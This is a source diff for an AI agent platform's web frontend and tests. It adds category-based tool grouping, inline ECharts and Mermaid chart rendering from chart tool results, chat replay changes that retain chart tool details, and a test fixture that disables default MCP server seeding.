          <p className="text-[10px] text-muted-foreground italic">
            No connected accounts yet. Authorize providers in the integrations
            page first.
          </p>
        ) : (
          <ul className="flex flex-col gap-1.5">
            {providers.map((provider) => (
              <li key={provider} className="flex items-center gap-2">
                <span className="text-[11px] font-medium text-foreground/80 w-20 truncate">
                  {provider}
                </span>
                <select
                  value={bindings[provider] ?? ""}
                  onChange={(e) => setAlias(provider, e.target.value)}
                  className="flex-1 text-xs px-1.5 py-0.5 rounded border border-border/60 bg-background"
                >
                  <option value="">— primary —</option>
                  {availableAliases[provider].map((alias) => (
                    <option key={alias} value={alias}>
                      {alias}
                    </option>
                  ))}
                </select>
              </li>
            ))}
          </ul>
        )}
      </div>
      <div className="flex justify-end gap-2 pt-1">
        <button
          onClick={onCancel}
          disabled={busy}
          className="text-[11px] px-2.5 py-1 rounded border border-border/60 text-muted-foreground hover:text-foreground hover:bg-muted/30 disabled:opacity-50 transition-colors"
        >
          Cancel
        </button>
        <button
          onClick={() =>
            // `task: undefined` when blank keeps the wire payload clean of
            // empty-string overrides.
            onSave({
              name,
              task: task || undefined,
              integrations: bindings,
            })
          }
          disabled={busy || nameError !== null}
          className="text-[11px] px-2.5 py-1 rounded bg-primary text-primary-foreground hover:bg-primary/90 disabled:opacity-50 transition-colors inline-flex items-center gap-1"
        >
          <Check className="w-3 h-3" /> Save
        </button>
      </div>
    </div>
  );
}
+92 -12
View File
@@ -8,7 +8,7 @@ import {
Wrench,
AlertCircle,
} from "lucide-react";
import type { ToolMeta, McpServerTools } from "@/api/queens";
import type { ToolMeta, McpServerTools, ToolCategory } from "@/api/queens";
/** Shape every Tools section (Queen / Colony) shares. */
export interface ToolsSnapshot {
@@ -17,11 +17,86 @@ export interface ToolsSnapshot {
lifecycle: ToolMeta[];
synthetic: ToolMeta[];
mcp_servers: McpServerTools[];
/** Optional: curated category groupings (queens only today). When
* present, tools that belong to a category are grouped under that
* category instead of their MCP server. */
categories?: ToolCategory[];
/** Optional: when true, the allowlist came from the role-based
* default (no explicit save). Only queens surface this today. */
is_role_default?: boolean;
}
type ToolWithEnabled = ToolMeta & { enabled: boolean };
interface RenderGroup {
/** Stable key for expansion state and React keys. */
key: string;
/** Display title shown in the collapsible header. */
title: string;
tools: ToolWithEnabled[];
}
/** Snake_case / kebab-case → Title Case for category labels so they
 * read naturally next to MCP server names. */
function formatCategoryTitle(name: string): string {
  const words = name.split(/[_-]+/).filter(Boolean);
  return words.map((word) => word[0].toUpperCase() + word.slice(1)).join(" ");
}
/** Build display groups with the priority: category → MCP server → "Other tools".
 * A tool that belongs to multiple categories lands in the first one (input order). */
function buildGroups(
  mcpServers: McpServerTools[],
  categories: ToolCategory[] | undefined,
): RenderGroup[] {
  // First-category-wins lookup: tool name → owning category name.
  const categoryOf = new Map<string, string>();
  for (const cat of categories ?? []) {
    for (const toolName of cat.tools) {
      if (!categoryOf.has(toolName)) categoryOf.set(toolName, cat.name);
    }
  }

  // Seed category groups up front so they always precede MCP-server
  // groups in the output, independent of tool encounter order.
  const groups = new Map<string, RenderGroup>();
  for (const cat of categories ?? []) {
    const key = `cat:${cat.name}`;
    groups.set(key, { key, title: formatCategoryTitle(cat.name), tools: [] });
  }

  for (const srv of mcpServers) {
    for (const tool of srv.tools) {
      const catName = categoryOf.get(tool.name);
      // Resolve the destination group: category wins, then a named
      // server, then the catch-all bucket for "(unknown)" / unnamed.
      const [key, title] = catName
        ? [`cat:${catName}`, formatCategoryTitle(catName)]
        : srv.name && srv.name !== "(unknown)"
          ? [`srv:${srv.name}`, srv.name]
          : ["other", "Other tools"];
      const existing = groups.get(key);
      if (existing) {
        existing.tools.push(tool);
      } else {
        groups.set(key, { key, title, tools: [tool] });
      }
    }
  }

  // Drop empty groups (e.g. a declared category none of whose tools
  // are present in any server).
  return [...groups.values()].filter((g) => g.tools.length > 0);
}
export interface ToolsEditorProps {
/** Stable identifier — refetches when it changes. */
subjectKey: string;
@@ -219,6 +294,11 @@ export default function ToolsEditor({
return s;
}, [data]);
const groups = useMemo(
() => (data ? buildGroups(data.mcp_servers, data.categories) : []),
[data],
);
const dirty = useMemo(() => {
const a = draftAllowed;
const b = baselineRef.current;
@@ -401,10 +481,10 @@ export default function ToolsEditor({
</CollapsibleGroup>
)}
{data.mcp_servers.map((srv) => {
const toolNames = srv.tools.map((t) => t.name);
{groups.map((group) => {
const toolNames = group.tools.map((t) => t.name);
const state = triStateForServer(toolNames, draftAllowed);
const enabledInServer =
const enabledInGroup =
draftAllowed === null
? toolNames.length
: toolNames.reduce(
@@ -413,13 +493,13 @@ export default function ToolsEditor({
);
return (
<CollapsibleGroup
key={srv.name}
title={srv.name === "(unknown)" ? "MCP Tools" : srv.name}
count={srv.tools.length}
badge={`${enabledInServer}/${srv.tools.length}`}
expanded={!!expanded[srv.name]}
key={group.key}
title={group.title}
count={group.tools.length}
badge={`${enabledInGroup}/${group.tools.length}`}
expanded={!!expanded[group.key]}
onToggle={() =>
setExpanded((p) => ({ ...p, [srv.name]: !p[srv.name] }))
setExpanded((p) => ({ ...p, [group.key]: !p[group.key] }))
}
leading={
<TriStateCheckbox
@@ -429,12 +509,12 @@ export default function ToolsEditor({
}
>
<div className="flex flex-col">
{srv.tools.map((t) => {
{group.tools.map((t) => {
const enabled =
draftAllowed === null ? true : draftAllowed.has(t.name);
return (
<ToolRow
key={`${srv.name}-${t.name}`}
key={`${group.key}-${t.name}`}
name={t.name}
description={t.description}
enabled={enabled}
@@ -0,0 +1,158 @@
/**
* Per-call detail row for ``chart_*`` tool calls.
*
* The canonical embedding mechanism: when the agent invokes
* ``chart_render``, the runtime stores the result envelope in
* ``events.jsonl``; ``chat-helpers.replayEvent`` retains it and the
* chat panel dispatches it here. We read ``result.spec`` and mount
* the live renderer; ``result.file_url`` becomes the download link.
*
* Rules baked in:
* - The chart is reconstructed FROM THE TOOL RESULT, not from any
* markdown fence the agent might have written. Calling the tool
* IS the embedding — there's nothing else to remember.
* - The chart survives session reload because the spec lives in
* events.jsonl alongside the tool_call_completed event.
* - The downloadable PNG lives at ``result.file_url`` (a ``file://``
* URI on the runtime host). The web frontend can't open file://
* directly; we surface ``file_path`` as text and give a Copy
* button so the user can paste it into a file manager. (The
* desktop renderer has an Electron IPC bridge — not available
* in OSS.)
*/
import { lazy, Suspense, useState } from "react";
import { Copy, Loader2, Check } from "lucide-react";
// Lazy chunks so non-chart messages don't drag in echarts/mermaid.
const EChartsBlock = lazy(() => import("./EChartsBlock"));
const MermaidBlock = lazy(() => import("./MermaidBlock"));
export interface ChartToolEntry {
name: string;
done: boolean;
args?: unknown;
result?: unknown;
isError?: boolean;
callKey?: string;
}
interface ChartResult {
kind?: "echarts" | "mermaid";
spec?: unknown;
file_path?: string;
file_url?: string;
title?: string;
error?: string;
// Width/height come back from the server tool but are NOT displayed
// in the footer. Kept here so the live in-chat render can match the
// spec's native aspect ratio instead of forcing a 16:9 box that
// clips wide dashboards.
width?: number;
height?: number;
}
function asResult(v: unknown): ChartResult {
  // Non-object results (strings, null, undefined) collapse to an empty
  // envelope so downstream field access stays safe.
  return typeof v === "object" && v !== null ? (v as ChartResult) : {};
}
/**
 * Render the detail row for a single chart_* tool call.
 *
 * While the call is running, shows a small spinner; once done, mounts
 * the live renderer (ECharts or Mermaid) from `result.spec` and a
 * footer with the chart title and a copy-path button for the PNG.
 * Returns null for error results and for results missing kind/spec.
 */
export default function ChartToolDetail({ entry }: { entry: ChartToolEntry }) {
  // Copy-button feedback state; must be declared before any early
  // return so the hook order is stable across renders.
  const [copyState, setCopyState] = useState<"idle" | "copied">("idle");

  // Still running: show a tiny inline spinner. Charts render fast (a
  // few hundred ms), so a full skeleton would flash and feel janky.
  if (!entry.done) {
    return (
      <div className="pl-10 mt-1.5">
        <div className="flex items-center gap-2 text-[11px] text-muted-foreground">
          <Loader2 className="w-3 h-3 animate-spin shrink-0" />
          <span>rendering chart</span>
        </div>
      </div>
    );
  }

  const result = asResult(entry.result);

  if (result.error) {
    // Errors are intentionally NOT shown to the user — the agent sees
    // them in the tool result envelope and is expected to retry with a
    // fixed spec.
    return null;
  }

  const kind = result.kind;
  const spec = result.spec;
  // Nothing renderable (e.g. malformed envelope): render nothing
  // rather than an empty card.
  if (!kind || spec === undefined) {
    return null;
  }

  // Copy the runtime-host PNG path to the clipboard and flash
  // "Copied" for two seconds.
  const handleCopyPath = async () => {
    if (!result.file_path) return;
    try {
      await navigator.clipboard.writeText(result.file_path);
      setCopyState("copied");
      window.setTimeout(() => setCopyState("idle"), 2000);
    } catch {
      // Clipboard API unavailable (insecure context); silently no-op.
    }
  };

  // Honor the spec's native aspect ratio when both dimensions are
  // known (the server tool always returns them).
  const aspectRatio =
    result.width && result.height ? result.width / result.height : undefined;

  return (
    <div className="pl-10 mt-1.5 max-w-5xl">
      <Suspense
        fallback={
          <div className="flex items-center gap-2 text-[11px] text-muted-foreground">
            <Loader2 className="w-3 h-3 animate-spin" />
            <span>loading chart engine</span>
          </div>
        }
      >
        {kind === "echarts" ? (
          <EChartsBlock spec={spec} aspectRatio={aspectRatio} />
        ) : kind === "mermaid" ? (
          <MermaidBlock source={typeof spec === "string" ? spec : ""} />
        ) : (
          <div className="text-[11px] text-muted-foreground">
            unknown chart kind: {String(kind)}
          </div>
        )}
      </Suspense>
      {/* Footer: title + path-copy. The PNG lives on the runtime host;
          web browsers can't open file:// URIs from a hosted page, so
          we surface the path as a copyable string instead of a fake
          Download button. */}
      <div className="flex items-center justify-between mt-2 px-1 text-[10.5px] text-muted-foreground/80">
        <span className="truncate min-w-0 flex-1">
          {result.title || kind}
        </span>
        {result.file_path && (
          <button
            type="button"
            onClick={handleCopyPath}
            className="inline-flex items-center gap-1 hover:text-foreground transition shrink-0 cursor-pointer"
            title={
              copyState === "copied"
                ? "Copied to clipboard"
                : `Copy path: ${result.file_path}`
            }
          >
            {copyState === "copied" ? (
              <Check className="w-3 h-3 text-primary" />
            ) : (
              <Copy className="w-3 h-3" />
            )}
            {copyState === "copied" ? "Copied" : "Copy path"}
          </button>
        )}
      </div>
    </div>
  );
}
@@ -0,0 +1,232 @@
/**
* Live ECharts renderer for the chat bubble.
*
* Mounts an ECharts instance into a sized div and feeds it the spec
* the agent passed to `chart_render`. The same spec is rendered
* server-side to a PNG; the live render is the in-chat experience,
* the PNG is the downloadable.
*
* - Lazy-loaded via dynamic import so non-chart messages don't pay
* the ~1 MB bundle cost.
* - SVG renderer (`{ renderer: 'svg' }`) for crisp scaling and lower
* memory than canvas. Looks identical at chat-bubble sizes.
* - Resize handled via ResizeObserver; charts adapt to the bubble's
* width while keeping a fixed aspect ratio.
* - Error boundary inside the component itself: invalid specs render
* a tiny "spec invalid" pill with a copy-spec button so the agent
* can self-correct on the next turn.
*/
import { useEffect, useRef, useState } from "react";
import { AlertCircle } from "lucide-react";
import { buildOpenHiveTheme } from "./openhiveTheme";
interface Props {
spec: unknown;
/** Aspect ratio kept while the width adapts to the bubble. Defaults
* to 16:9 — the standard chart shape that fits in slide decks. */
aspectRatio?: number;
/** Hard cap on rendered height (px). Prevents very-tall charts from
* dominating the chat scroll. */
maxHeight?: number;
}
const _themeRegistered: Record<"light" | "dark", boolean> = {
light: false,
dark: false,
};
/**
 * Detect the user's current UI theme from the DOM. The OpenHive
 * desktop app applies a `dark` class to <html> in dark mode (see
 * index.css). We use the same signal here so the live chart matches
 * the surrounding chat — neither the agent nor the caller picks the
 * theme, and the PNG download is rendered server-side from the same
 * source of truth (HIVE_DESKTOP_THEME env, set by Electron from
 * nativeTheme.shouldUseDarkColors).
 */
function useDocumentTheme(): "light" | "dark" {
  const [theme, setTheme] = useState<"light" | "dark">(() =>
    document.documentElement.classList.contains("dark") ? "dark" : "light",
  );

  useEffect(() => {
    const root = document.documentElement;
    // Watch only the class attribute on <html>; that's the single
    // place the app flips light/dark.
    const observer = new MutationObserver(() => {
      setTheme(root.classList.contains("dark") ? "dark" : "light");
    });
    observer.observe(root, { attributes: true, attributeFilter: ["class"] });
    return () => observer.disconnect();
  }, []);

  return theme;
}
/**
 * Mount a live ECharts instance for `spec` inside a sized container.
 *
 * The effect re-runs whenever `spec` or the document theme changes:
 * the old instance is disposed in cleanup and a fresh one is created.
 * Invalid specs render a compact error pill instead of the chart.
 */
export default function EChartsBlock({
  spec,
  aspectRatio = 16 / 9,
  maxHeight = 480,
}: Props) {
  const containerRef = useRef<HTMLDivElement>(null);
  const chartRef = useRef<unknown>(null); // echarts.ECharts instance, kept untyped to avoid coupling the type import
  const [error, setError] = useState<string | null>(null);

  // Theme follows the user's OpenHive UI mode automatically. Same
  // signal feeds the server-side PNG render via HIVE_DESKTOP_THEME, so
  // live chart and downloaded file always match.
  const theme = useDocumentTheme();

  // NOTE(review): once `error` is set the container div unmounts, and a
  // later effect run bails on the null ref below — a subsequently valid
  // spec can't recover without clearing `error` first. Confirm whether
  // specs ever change in place for a mounted block before fixing.
  useEffect(() => {
    if (!containerRef.current) return;
    let disposed = false;
    let resizeObserver: ResizeObserver | null = null;

    (async () => {
      try {
        const echarts = await import("echarts");
        // Re-check after the await: cleanup may have run (spec/theme
        // change or unmount) while the echarts chunk was loading.
        if (disposed || !containerRef.current) return;

        // Register the OpenHive brand theme once per (theme, mode) so
        // bar/line/etc. inherit our palette + cozy spacing instead of
        // ECharts' generic-web-2010 defaults. Theme matches the
        // server-side render via tools/src/chart_tools/theme.py.
        const themeName = theme === "dark" ? "openhive-dark" : "openhive-light";
        if (!_themeRegistered[theme]) {
          echarts.registerTheme(themeName, buildOpenHiveTheme(theme));
          _themeRegistered[theme] = true;
        }

        // Coerce string specs to objects (defensive — the agent should
        // pass dicts but LLMs sometimes serialize before sending).
        let parsedSpec: Record<string, unknown>;
        if (typeof spec === "string") {
          try {
            parsedSpec = JSON.parse(spec);
          } catch {
            throw new Error("spec is a string and not valid JSON");
          }
        } else {
          parsedSpec = spec as Record<string, unknown>;
        }

        // Disjoint-region layout policy. ECharts has no auto-layout
        // for component overlap (verified against the option ref):
        // title/legend/grid are absolutely positioned and ignore each
        // other. We enforce three non-overlapping regions:
        //   - Title: anchored to TOP (top:16, no bottom)
        //   - Legend: anchored to BOTTOM (bottom:16, no top) except
        //     when orient:'vertical' (side legend stays where placed)
        //   - Grid: middle, with containLabel for axis labels
        // Strips user-supplied vertical positions so an agent spec
        // like `legend.top:"8%"` (which lands inside the title at
        // chat-bubble dimensions — the 2026-05-01 bug) can't collide.
        // Horizontal anchoring is preserved so left-aligned legends
        // still work. Must mirror chart_tools/renderer.py exactly so
        // the live chart and downloaded PNG look the same.
        const userTitle = (parsedSpec.title as Record<string, unknown> | undefined) ?? {};
        const userLegend = parsedSpec.legend as Record<string, unknown> | undefined;
        const userGrid = (parsedSpec.grid as Record<string, unknown> | undefined) ?? {};
        const legendVertical = userLegend?.orient === "vertical";
        // Drop vertical anchors (top/bottom) from a component config;
        // horizontal anchors pass through untouched.
        const stripV = (o: Record<string, unknown>) => {
          const c = { ...o };
          delete c.top;
          delete c.bottom;
          return c;
        };
        const normalizedSpec: Record<string, unknown> = {
          ...parsedSpec,
          title: { left: "center", ...stripV(userTitle), top: 16 },
          grid: {
            left: 56,
            right: 56,
            ...stripV(userGrid),
            // Force vertical bounds — user-supplied grid.top/bottom
            // (often percentage strings like "8%" the agent picks at
            // default dims) don't generalize across chat-bubble sizes.
            // 96 covers: bottom legend (~36) + xAxis name (containLabel
            // handles tick labels but NOT axis name; outerBoundsMode is
            // v6+ and we're on v5). 40 when no legend.
            top: 64,
            bottom: userLegend && !legendVertical ? 96 : 40,
            containLabel: true,
          },
        };
        if (userLegend) {
          const legendDefaults = {
            icon: "roundRect",
            itemWidth: 12,
            itemHeight: 12,
            itemGap: 16,
          };
          normalizedSpec.legend = legendVertical
            ? { ...legendDefaults, ...userLegend }
            : { ...legendDefaults, ...stripV(userLegend), bottom: 16 };
        }

        // Fresh chart instance per spec; cheaper than reuse + setOption
        // for our sizes and avoids stale state between specs.
        const chart = echarts.init(containerRef.current, themeName, {
          renderer: "svg",
        });
        chartRef.current = chart;
        chart.setOption(normalizedSpec, {
          notMerge: true,
          lazyUpdate: false,
        });

        // Resize on container size change.
        resizeObserver = new ResizeObserver(() => {
          if (chartRef.current && containerRef.current) {
            (chartRef.current as { resize: () => void }).resize();
          }
        });
        resizeObserver.observe(containerRef.current);
      } catch (e) {
        if (!disposed) {
          setError(e instanceof Error ? e.message : String(e));
        }
      }
    })();

    return () => {
      disposed = true;
      if (resizeObserver) resizeObserver.disconnect();
      if (chartRef.current) {
        try {
          (chartRef.current as { dispose: () => void }).dispose();
        } catch {
          // best-effort cleanup
        }
        chartRef.current = null;
      }
    };
  }, [spec, theme]);

  if (error) {
    return (
      <div
        className="flex items-center gap-2 text-[11px] text-muted-foreground px-2.5 py-1.5 rounded-md border border-border/40 bg-muted/30"
        role="alert"
      >
        <AlertCircle className="w-3 h-3 shrink-0" />
        <span>chart spec invalid: {error}</span>
      </div>
    );
  }

  return (
    <div
      ref={containerRef}
      // Transparent background so the chart blends with the chat bubble
      // instead of sitting in an obtrusive white card. The OpenHive
      // ECharts theme also sets backgroundColor: 'transparent' so the
      // chart itself is see-through. Subtle rounded corners only.
      className="w-full rounded-lg bg-transparent"
      style={{
        // Reserve aspect-ratio space so the chart doesn't pop in.
        // ECharts will overwrite the inline style as it lays out.
        aspectRatio,
        maxHeight,
      }}
    />
  );
}
@@ -0,0 +1,81 @@
/**
* Live Mermaid renderer for the chat bubble.
*
* Renders a mermaid source string to an inline SVG. Mermaid is
* lazy-loaded so non-diagram messages don't pay the ~600 KB cost.
*
* Theme follows the OpenHive light/dark setting. Errors render a
* tiny pill so the agent gets feedback for the next turn.
*/
import { useEffect, useRef, useState } from "react";
import { AlertCircle } from "lucide-react";
interface Props {
source: string;
theme?: "light" | "dark";
}
// Theme mermaid was last initialized with. Mermaid's config is global,
// so we must re-run initialize() whenever a block requests a different
// theme than the one currently applied.
let _mermaidInitializedTheme: "light" | "dark" | null = null;

/**
 * Render `source` to an inline SVG diagram.
 *
 * Fixes over the previous revision:
 * - The old boolean init guard ran `mermaid.initialize` exactly once,
 *   so a `theme` change after the first diagram was silently ignored
 *   even though `theme` sits in the effect's dependency array. We now
 *   track the initialized theme and re-initialize on mismatch.
 * - `error` was sticky: while the error pill showed, the container div
 *   was unmounted, so a corrected `source` had no element to render
 *   into and the pill persisted forever. The effect now clears the
 *   error when its inputs change.
 */
export default function MermaidBlock({ source, theme = "light" }: Props) {
  const ref = useRef<HTMLDivElement>(null);
  const [error, setError] = useState<string | null>(null);

  useEffect(() => {
    let disposed = false;
    // Clear any stale error so the container div remounts before the
    // async render below tries to write into it.
    setError(null);
    (async () => {
      try {
        const mermaid = (await import("mermaid")).default;
        if (_mermaidInitializedTheme !== theme) {
          mermaid.initialize({
            startOnLoad: false,
            theme: theme === "dark" ? "dark" : "default",
            securityLevel: "loose",
            fontFamily:
              "'Inter Tight', -apple-system, BlinkMacSystemFont, system-ui, sans-serif",
          });
          _mermaidInitializedTheme = theme;
        }
        if (disposed || !ref.current) return;
        // Unique id per render to avoid conflicting injected styles.
        const id = `mmd-${Math.random().toString(36).slice(2, 10)}`;
        const { svg } = await mermaid.render(id, source);
        if (disposed || !ref.current) return;
        ref.current.innerHTML = svg;
      } catch (e) {
        if (!disposed) {
          setError(e instanceof Error ? e.message : String(e));
        }
      }
    })();
    return () => {
      disposed = true;
    };
  }, [source, theme]);

  if (error) {
    return (
      <div
        className="flex items-center gap-2 text-[11px] text-muted-foreground px-2.5 py-1.5 rounded-md border border-border/40 bg-muted/30"
        role="alert"
      >
        <AlertCircle className="w-3 h-3 shrink-0" />
        <span>diagram syntax invalid: {error}</span>
      </div>
    );
  }

  return (
    <div
      ref={ref}
      // Match EChartsBlock: transparent so the diagram blends with the
      // chat bubble; rounded corners and inner padding give breathing
      // room without adding a visible card.
      className="w-full overflow-x-auto rounded-lg bg-transparent p-4 [&_svg]:max-w-full [&_svg]:h-auto [&_svg]:mx-auto"
    />
  );
}
@@ -0,0 +1,131 @@
/**
* OpenHive ECharts theme — must stay in sync with
* tools/src/chart_tools/theme.py on the runtime side.
*
* Same palette + spacing both for the live in-chat ECharts mount
* (see EChartsBlock.tsx) and the headless server-side render that
* produces the downloadable PNG. Without this both diverge: the chat
* shows ECharts default colors and the PNG shows OpenHive colors,
* confusing the user.
*/
const PALETTE_LIGHT = [
"#db6f02", // honey orange (primary)
"#456a8d", // slate blue
"#3d7a4a", // sage green
"#a8453d", // terracotta brick
"#c48820", // warm bronze
"#5d5b88", // indigo
"#7d6b51", // olive
"#8e4200", // rust
];
const PALETTE_DARK = [
"#ffb825",
"#7ba2c4",
"#7bb285",
"#d97470",
"#e0a83a",
"#9892c4",
"#b8a685",
"#d97e3a",
];
/**
 * Build the OpenHive ECharts theme object for the given UI mode.
 *
 * The returned object is passed verbatim to `echarts.registerTheme`;
 * it must stay token-for-token in sync with the server-side
 * tools/src/chart_tools/theme.py so the live chart and the PNG match.
 *
 * @param theme "light" (default) or "dark" — selects palette and the
 *   foreground / grid / tooltip color ramp.
 */
export function buildOpenHiveTheme(theme: "light" | "dark" = "light") {
  const isDark = theme === "dark";
  // Color ramp: primary text, muted text, faint grid lines, axis
  // lines, and tooltip surface — each with a light and dark variant.
  const fg = isDark ? "#e8e6e0" : "#1a1a1a";
  const fgMuted = isDark ? "#8a8a8a" : "#6b6b6b";
  const gridLine = isDark ? "#2a2724" : "#ebe9e2";
  const axisLine = isDark ? "#3a3733" : "#d0cfca";
  const tooltipBg = isDark ? "#181715" : "#ffffff";
  const tooltipBorder = isDark ? "#2a2724" : "#d0cfca";
  const palette = isDark ? PALETTE_DARK : PALETTE_LIGHT;

  return {
    color: palette,
    backgroundColor: "transparent",
    textStyle: {
      fontFamily:
        '"Inter Tight", -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif',
      color: fg,
      fontSize: 12,
    },
    title: {
      left: "center",
      top: 28,
      textStyle: { color: fg, fontSize: 16, fontWeight: 600 },
      subtextStyle: { color: fgMuted, fontSize: 12 },
    },
    legend: {
      top: 64,
      icon: "roundRect",
      itemWidth: 12,
      itemHeight: 12,
      itemGap: 20,
      textStyle: { color: fgMuted, fontSize: 12 },
    },
    grid: {
      top: 116,
      left: 48,
      right: 48,
      bottom: 72,
      containLabel: true,
    },
    categoryAxis: {
      axisLine: { show: true, lineStyle: { color: axisLine } },
      axisTick: { show: false },
      axisLabel: { color: fgMuted, fontSize: 11, margin: 14 },
      splitLine: { show: false },
      nameLocation: "middle",
      nameGap: 36,
      nameTextStyle: { color: fgMuted, fontSize: 12 },
    },
    valueAxis: {
      axisLine: { show: false },
      axisTick: { show: false },
      axisLabel: { color: fgMuted, fontSize: 11, margin: 14 },
      splitLine: { lineStyle: { color: gridLine, type: "dashed" } },
      nameLocation: "middle",
      nameGap: 42,
      nameTextStyle: { color: fgMuted, fontSize: 12, fontWeight: 500 },
      // Don't auto-rotate value-axis names — the theme can't tell xAxis
      // (horizontal bar) from yAxis (vertical bar), so rotating both at
      // 90° vertical-mounts the xAxis name on horizontal-bar charts and
      // it collides with the legend (peer_val regression). Let specs
      // set nameRotate explicitly when they want a vertical y-name.
    },
    timeAxis: {
      axisLine: { show: true, lineStyle: { color: axisLine } },
      axisLabel: { color: fgMuted, fontSize: 11, margin: 14 },
      splitLine: { show: false },
      nameLocation: "middle",
      nameGap: 36,
      nameTextStyle: { color: fgMuted, fontSize: 12 },
    },
    tooltip: {
      backgroundColor: tooltipBg,
      borderColor: tooltipBorder,
      borderWidth: 1,
      padding: [8, 12],
      textStyle: { color: fg, fontSize: 12 },
      axisPointer: {
        lineStyle: { color: axisLine, type: "dashed" },
        crossStyle: { color: axisLine },
      },
    },
    bar: { itemStyle: { borderRadius: [3, 3, 0, 0] } },
    line: {
      lineStyle: { width: 2.5 },
      symbol: "circle",
      symbolSize: 6,
    },
    // Candlestick colors are fixed (sage up / terracotta down) in both
    // modes rather than drawn from the palette.
    candlestick: {
      itemStyle: {
        color: "#3d7a4a",
        color0: "#a8453d",
        borderColor: "#3d7a4a",
        borderColor0: "#a8453d",
      },
    },
  };
}
+83 -8
View File
@@ -295,12 +295,40 @@ export function sseEventToChatMessage(
* deferred `tool_call_completed` events can find the exact pill they belong
* to after the turn counter moves on.
*/
/**
* For chart_* tools we retain the args (from tool_call_started) and
* result envelope (from tool_call_completed) so the chat panel can
* render the live chart inline from the same spec the runtime
* rasterized to PNG. Other tools omit these fields to keep the
* tool_status content payload small (catalogs are pill-only).
*/
type ToolEntry = {
name: string;
done: boolean;
/** opaque per-call id surfaced to the UI; used to key React rows */
callKey?: string;
/** present only for tools whose name matches shouldRetainDetail */
args?: unknown;
result?: unknown;
isError?: boolean;
};
type ToolRowState = {
streamId: string;
executionId: string;
tools: Record<string, { name: string; done: boolean }>;
tools: Record<string, ToolEntry>;
};
/**
 * Names whose detail (args + result envelope) we surface in the chat.
 * Other tools stay pill-only — keeping their args/results out of the
 * message content avoids ballooning the chat history with tool
 * catalogs, file blobs, etc.
 */
function shouldRetainDetail(toolName: string): boolean {
  return /^chart_/.test(toolName);
}
export interface ReplayState {
turnCounters: Record<string, number>;
toolRows: Record<string, ToolRowState>;
@@ -349,10 +377,20 @@ function toolLookupKey(
}
function toolRowContent(row: ToolRowState): string {
  // Project each tracked call into the wire shape. Detail fields
  // (callKey/args/result/isError) ride along only for retained-detail
  // tools (chart_*); everything else stays terse so the tool_status
  // payload doesn't grow with every catalog/file_ops call and existing
  // snapshot tests stay valid.
  const tools: ToolEntry[] = [];
  for (const entry of Object.values(row.tools)) {
    const projected: ToolEntry = { name: entry.name, done: entry.done };
    if (shouldRetainDetail(entry.name)) {
      if (entry.callKey !== undefined) projected.callKey = entry.callKey;
      if (entry.args !== undefined) projected.args = entry.args;
      if (entry.result !== undefined) projected.result = entry.result;
      if (entry.isError !== undefined) projected.isError = entry.isError;
    }
    tools.push(projected);
  }
  const allDone = tools.length > 0 && tools.every((t) => t.done);
  return JSON.stringify({ tools, allDone });
}
@@ -417,10 +455,19 @@ export function replayEvent(
tools: {},
});
const toolKey = toolUseId || `anonymous-${Object.keys(row.tools).length}`;
row.tools[toolKey] = {
const entry: ToolEntry = {
name: toolName,
done: false,
callKey: toolKey,
};
// Capture args at start for retained-detail tools so the chat
// can show what the agent rendered. Other tools' arguments are
// intentionally dropped to keep the tool_status JSON small.
if (shouldRetainDetail(toolName)) {
const toolInput = event.data?.tool_input;
if (toolInput !== undefined) entry.args = toolInput;
}
row.tools[toolKey] = entry;
if (toolUseId) {
state.toolUseToPill[toolLookupKey(streamId, event.execution_id, toolUseId)] = {
msgId: pillId,
@@ -453,10 +500,38 @@ export function replayEvent(
if (!tracked) break;
const row = state.toolRows[tracked.msgId];
if (!row) break;
row.tools[tracked.toolKey] = {
name: row.tools[tracked.toolKey]?.name || tracked.name,
const prior = row.tools[tracked.toolKey];
const completedName = prior?.name || tracked.name;
const completed: ToolEntry = {
name: completedName,
done: true,
callKey: tracked.toolKey,
};
// Preserve any args captured at start; capture the result
// envelope for retained-detail tools (chart_* needs spec/file_url
// to mount the live chart).
if (shouldRetainDetail(completedName)) {
if (prior?.args !== undefined) completed.args = prior.args;
const rawResult = event.data?.result;
if (rawResult !== undefined) {
// The framework serializes envelopes as JSON strings. Try to
// parse so the renderer can pick fields cheaply; fall back to
// the raw value when parsing fails (already-an-object or
// non-JSON string).
if (typeof rawResult === "string") {
try {
completed.result = JSON.parse(rawResult);
} catch {
completed.result = rawResult;
}
} else {
completed.result = rawResult;
}
}
const isErr = event.data?.is_error;
if (typeof isErr === "boolean") completed.isError = isErr;
}
row.tools[tracked.toolKey] = completed;
out.push({
id: tracked.msgId,
agent: effectiveName || event.node_id || "Agent",
+15
View File
@@ -60,6 +60,21 @@ _HIVE_PATH_NAMES = (
)
@pytest.fixture(autouse=True)
def _no_seed_mcp_defaults(monkeypatch):
    """Skip bundled-server seeding in ``MCPRegistry.initialize()`` for tests.

    Production wants ``initialize()`` to seed ``hive_tools`` / ``gcu-tools``
    / ``files-tools`` / ``terminal-tools`` / ``chart-tools`` so a fresh
    HIVE_HOME comes up with working defaults. Tests want a deterministic,
    empty registry — every assertion about counts, "no servers installed"
    output, or first-element identity breaks otherwise. Patching here
    keeps the production API clean and avoids a test-only flag on
    ``initialize()``.
    """
    # Replace the seeding hook with a no-op that reports zero seeded servers.
    monkeypatch.setattr(_mcp_registry.MCPRegistry, "_seed_defaults", lambda self: [])
@pytest.fixture(autouse=True)
def _isolate_hive_home_autouse(tmp_path, monkeypatch):
"""Per-test isolation of ``~/.hive`` to ``tmp_path/.hive``.
+1 -1
View File
@@ -889,7 +889,7 @@ def test_concurrency_safe_allowlist_is_conservative():
allowlist = ToolRegistry.CONCURRENCY_SAFE_TOOLS
# Positive assertions: known-safe read operations are present.
for name in ("read_file", "grep", "glob", "search_files", "web_search"):
for name in ("read_file", "terminal_rg", "terminal_find", "search_files", "web_scrape"):
assert name in allowlist, f"{name} should be concurrency-safe"
# Negative assertions: nothing that mutates state is allowed in.
+1 -1
View File
@@ -115,7 +115,7 @@ Hive LLM:
Notes:
- Set `provider` to `hive`
- Common Hive model values are `queen`, `kimi-2.5`, and `GLM-5`
- Common Hive model values are `queen`, `kimi-k2.5`, and `GLM-5`
- Hive LLM requests use the Hive endpoint at `https://api.adenhq.com`
### Search & Tools (optional)
+1 -1
View File
@@ -414,7 +414,7 @@ cd core && uv run python tests/dummy_agents/run_all.py --verbose
| parallel_merge | 4 | Fan-out/fan-in, failure strategies |
| retry | 4 | Retry mechanics, exhaustion, `ON_FAILURE` edges |
| feedback_loop | 3 | Feedback cycles, `max_node_visits` |
